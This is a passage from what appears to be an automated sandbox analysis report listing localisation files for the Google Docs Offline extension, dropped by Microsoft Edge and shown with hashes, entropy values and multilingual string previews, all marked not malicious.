                                                                                                                                                                                                                                                                                                Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                                MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                                SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                                SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                                SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):806
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                                MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                                SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                                SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                                SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):883
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                                MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                                SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                                SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                                SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1031
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                                MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                                SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                                SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                                SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1613
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                                MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                                SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                                SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                                SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):851
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):851
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):848
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                                MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                                SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                                SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                                SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1425
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                                MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                                SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                                SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                                SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):961
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                                MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                                SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                                SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                                SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):959
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                                MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                                SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                                SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                                SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):968
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                                MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                                SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                                SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                                SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):838
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                                MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                                SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                                SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                                SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1305
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                                MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                                SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                                SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                                SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
